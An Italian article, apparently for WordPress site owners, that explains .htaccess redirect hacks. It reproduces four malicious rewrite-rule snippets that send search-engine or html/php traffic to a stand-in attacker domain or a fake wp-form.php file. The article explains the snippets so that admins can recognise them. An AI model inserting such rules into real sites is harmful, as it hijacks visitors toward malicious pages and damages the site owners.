Attacco hacker: redirect .htaccess

Il codice sottostante è stato prelevato da un vero attacco hacker. Questo codice è stato trovato nel file .htaccess e reindirizza in automatico tutto il traffico del sito verso un altro sito.

<IfModule mod_rewrite.c>
        RewriteEngine On 
        RewriteBase /   
        RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
        RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
        RewriteRule ^.*$ http://EVILHACKERSITE.COM [L,R]
</IfModule>

Questo codice è leggermente più sofisticato e reindirizza solo pagine html o xml. E’ più sofisticato perché spesso viene notato solo se si visita un file html del sito (e ciò accade raramente nei siti WordPress).

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteRule ([^.]+\.(html|xml|))$ http://EVILHACKERSITE.COM [L,R]
</IfModule>

Questo codice verifica da dove proviene l’utente e, se arriva dai motori di ricerca, lo reindirizza:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://EVILHACKERSITE.COM/in.html?s=hg [R,L]
Errordocument 404 http://EVILHACKERSITE.COM/in.html?s=hg_err

Questo è un altro attacco hacker che prova ad unire i due precedenti identificando se l’utente proviene dai motori di ricerca o se sta accedendo ad un file con una specifica estensione (come detto, è un’azione che accade raramente in WordPress) e lo reindirizza.

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteCond %{HTTP_USER_AGENT} (google|msn|aol|bing) [NC,OR]
        RewriteCond %{HTTP_REFERER} (yahoo|google|aol|bing) [NC]
        RewriteCond %{REQUEST_URI} /$ [OR]
        RewriteCond %{REQUEST_FILENAME} (html|htm|shtm|shtml|php|php3|php4|php5)$ [NC]
        RewriteCond %{REQUEST_FILENAME} !wp-form\.php$
        RewriteRule ^.*?$ /wp-form.php [L]
</IfModule>

Questo è un attacco hacker molto subdolo perché crea un file wp-form.php, che assomiglia ad un file WordPress ma in realtà non corrisponde a nessun file WordPress autentico.

In questo file sono inclusi una serie di controlli e redirects che reindirizzano l’utente verso un altro sito. Di solito questo attacco hacker è facilmente riconoscibile perché le pagine di wp-admin di solito finiscono con .php, quindi l’amministratore si accorge che è in atto un reindirizzamento, ad esempio visitando la pagina dei plugin: example.com/wp-admin/plugins.php.